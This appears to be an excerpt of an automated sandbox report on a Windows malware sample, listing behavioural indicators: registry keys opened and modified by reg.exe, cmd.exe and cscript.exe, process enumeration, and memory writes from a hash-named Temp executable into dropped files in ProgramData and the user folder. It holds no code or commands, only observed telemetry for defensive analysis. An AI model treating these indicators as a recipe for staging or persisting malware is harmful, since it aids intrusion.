Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe
PID 2128 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe
PID 2128 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe
PID 2128 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe
PID 2128 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\LOAkMAgs\fAMIYEgY.exe
PID 2128 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\LOAkMAgs\fAMIYEgY.exe
PID 2128 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\LOAkMAgs\fAMIYEgY.exe
PID 2128 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\LOAkMAgs\fAMIYEgY.exe
PID 2128 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 1708 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 1708 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 1708 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
